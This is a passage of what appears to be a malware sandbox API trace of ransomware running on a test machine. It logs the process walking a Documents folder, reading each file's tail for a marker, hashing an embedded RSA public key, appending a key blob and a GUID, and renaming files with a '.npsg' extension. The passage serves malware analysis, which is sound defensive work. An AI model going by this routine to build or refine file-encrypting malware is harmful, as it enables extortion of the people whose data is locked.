lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.570] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.570] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.570] CloseHandle (hObject=0x644) returned 1 [0236.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x3b8f7a8 [0236.572] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-_F3s.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-_f3s.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-_F3s.xlsx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-_f3s.xlsx.npsg")) returned 1 [0236.574] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98fcb6f0, ftCreationTime.dwHighDateTime=0x1d551ef, ftLastAccessTime.dwLowDateTime=0xc57019a0, ftLastAccessTime.dwHighDateTime=0x1d55d2c, ftLastWriteTime.dwLowDateTime=0xc57019a0, ftLastWriteTime.dwHighDateTime=0x1d55d2c, nFileSizeHigh=0x0, nFileSizeLow=0x8066, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0u-c3b.pptx", cAlternateFileName="0U-C3B~1.PPT")) returned 1 [0236.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c900 [0236.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0236.575] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0u-c3b.pptx") returned=".pptx" [0236.575] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0u-c3b.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0u-c3b.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.576] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=32870) returned 1 [0236.576] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.579] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x8040, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.579] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.582] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x8066, lpOverlapped=0x0) returned 1 [0236.583] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.583] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.583] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.583] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.584] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.584] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.585] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.585] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.585] GetLastError () returned 0x0 [0236.585] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.585] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.585] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.585] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.585] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.585] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8f7a8 [0236.586] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x8066, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.586] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.586] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.586] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.586] CloseHandle (hObject=0x644) returned 1 [0236.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b8f7a8 [0236.596] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0u-c3b.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0u-c3b.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0u-c3b.pptx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0u-c3b.pptx.npsg")) returned 1 [0236.598] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e7f2410, ftCreationTime.dwHighDateTime=0x1d57309, ftLastAccessTime.dwLowDateTime=0x21e56540, ftLastAccessTime.dwHighDateTime=0x1d5b166, ftLastWriteTime.dwLowDateTime=0x21e56540, ftLastWriteTime.dwHighDateTime=0x1d5b166, nFileSizeHigh=0x0, nFileSizeLow=0xcd88, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="539qu3OPBhaEuGH7qKww.pptx", cAlternateFileName="539QU3~1.PPT")) returned 1 [0236.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c900 [0236.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0236.598] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\539qu3OPBhaEuGH7qKww.pptx") returned=".pptx" [0236.598] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\539qu3OPBhaEuGH7qKww.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\539qu3opbhaeugh7qkww.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.599] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=52616) returned 1 [0236.599] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.601] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xcd62, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.602] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.603] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xcd88, lpOverlapped=0x0) returned 1 [0236.604] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.604] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.605] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.605] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.606] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.606] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.606] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.606] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.606] GetLastError () returned 0x0 [0236.606] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.606] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.606] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.606] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.606] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.607] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8ca68 [0236.607] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xcd88, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.607] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.607] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.607] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.608] CloseHandle (hObject=0x644) returned 1 [0236.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e728 [0236.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b8f7a8 [0236.609] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\539qu3OPBhaEuGH7qKww.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\539qu3opbhaeugh7qkww.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\539qu3OPBhaEuGH7qKww.pptx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\539qu3opbhaeugh7qkww.pptx.npsg")) returned 1 [0236.611] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a8dca00, ftCreationTime.dwHighDateTime=0x1d59e56, ftLastAccessTime.dwLowDateTime=0x441eda40, ftLastAccessTime.dwHighDateTime=0x1d56433, ftLastWriteTime.dwLowDateTime=0x441eda40, ftLastWriteTime.dwHighDateTime=0x1d56433, nFileSizeHigh=0x0, nFileSizeLow=0x11951, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B6sDRQG.pptx", cAlternateFileName="B6SDRQ~1.PPT")) returned 1 [0236.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c900 [0236.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0236.611] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B6sDRQG.pptx") returned=".pptx" [0236.612] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B6sDRQG.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b6sdrqg.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.612] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=72017) returned 1 [0236.612] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.615] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1192b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.615] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.617] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x11951, lpOverlapped=0x0) returned 1 [0236.618] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.618] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.618] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.618] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.619] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.619] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.619] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.619] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.619] GetLastError () returned 0x0 [0236.619] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.620] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.620] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.620] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.620] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.620] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8f7a8 [0236.621] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x11951, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.621] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.621] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.621] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.622] CloseHandle (hObject=0x644) returned 1 [0236.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b8f7a8 [0236.624] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B6sDRQG.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b6sdrqg.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B6sDRQG.pptx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b6sdrqg.pptx.npsg")) returned 1 [0236.626] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cc240c0, ftCreationTime.dwHighDateTime=0x1d5a535, ftLastAccessTime.dwLowDateTime=0x4207a90, ftLastAccessTime.dwHighDateTime=0x1d53ccc, ftLastWriteTime.dwLowDateTime=0x4207a90, ftLastWriteTime.dwHighDateTime=0x1d53ccc, nFileSizeHigh=0x0, nFileSizeLow=0x3ee4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D7SRnQXh-dQO9IFpl.docx", cAlternateFileName="D7SRNQ~1.DOC")) returned 1 [0236.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c900 [0236.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0236.626] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D7SRnQXh-dQO9IFpl.docx") returned=".docx" [0236.626] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D7SRnQXh-dQO9IFpl.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\d7srnqxh-dqo9ifpl.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 